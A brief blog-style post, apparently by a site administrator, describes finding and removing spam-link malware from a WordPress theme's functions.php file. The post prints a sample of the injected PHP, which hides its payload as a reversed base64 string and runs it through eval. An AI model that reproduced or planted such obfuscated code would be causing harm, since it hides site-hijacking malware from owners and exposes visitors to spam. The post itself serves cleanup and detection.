One of the wordpess site was hacked with a spam link. spam link was porn and pharma link automatically generated in the website. After browsing internet it was bas64_encode added in reverse in the theme functions.php file.

base64_encode code as a reversed string and the strrev() makes it hard to find the two biggest red flags here: base64_encode and eval.

Sample

[sc:tcbox ]

P05WZ052bjRyOiISP05WZ052bjRyepwmc1RCK5kTOfxmc19FdldGIu9Wa0Nmb1Z2epU2csFmZ90TPpcSO5kzXsJXdfRXZndCKzR3cphXZf52bpR3YuVnZoYWa”(edoced_46esab(lave’));?>

[sc:/tcbox ]

After removing the particular php codes everything was solved.